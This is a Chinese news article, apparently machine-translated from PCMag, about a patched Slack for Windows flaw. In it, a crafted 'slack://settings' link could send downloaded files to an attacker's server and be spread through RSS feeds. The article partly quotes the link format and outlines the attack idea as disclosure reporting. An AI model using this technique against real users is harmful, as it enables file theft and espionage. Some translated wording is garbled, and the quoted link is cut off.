Slack修补了可能用于间谍活动的Windows应用程序错误
一位安全研究人员发现了Slack中的一个漏洞,该漏洞可能被利用来窃取商业消息应用程序上的文件并可能传播恶意软件。
该缺陷涉及Slack的Windows桌面应用程序,以及它如何自动将下载的文件发送到某个目的地 – 无论是在您的PC上还是在线存储服务器上。您可以在应用程序的首选项部分设置下载位置。然而,安全公司Tenable的研究员David Wells注意到还有另一种配置选项的方法:通过特殊链接。
“制作像'slack:// settings /?update = {'PrefSSBFileDownloadPath'这样的链接:
威尔斯意识到同样的功能可能被滥用。想象一下,黑客利用这些链接秘密重新配置Slack桌面应用程序,将所有下载的文件发送到外部服务器。 “使用这种攻击媒介,内部人员可以利用此漏洞进行企业间谍活动,操纵或访问其权限之外的文档,”Well的安全公司Tenable在一份单独的报告中说。
图片:大卫井/中/截图
该漏洞还可能为潜在的恶意软件感染铺平道路。发送到黑客控制器服务器的任何下载文件都可以更改,并且可能会陷入困境以包含恶意代码。一旦受害者在Slack桌面应用程序上打开文件,攻击就会开始。
实施此攻击的主要障碍是将黑客创建的链接传播给Slack上的人员,Slack将其频道保密为付费客户及其公司。为了解决这个问题,Wells注意到如何配置Slack通道来订阅RSS提要,包括Reddit上的线程。
“我可以向一个非常受欢迎的Reddit社区发帖,让世界各地的Slack用户订阅,”Wells说。黑客创建的链接将填充在Slack通道内,并可能吸引一些点击。
“这种技术可能会被精明的Slack用户揭穿,但是如果数十年的网络钓鱼活动教会了我们什么,那就是用户点击链接,当通过不受信任的RSS提要进行利用时,影响会变得更加有趣,”他补充道。
Slack修补了Windows桌面应用程序3.4.0版本中的漏洞。该公司在一封电子邮件中说:“我们进行了调查,未发现此漏洞曾被利用过,也未发现我们的用户受到影响。”
本文最初发表于PCMag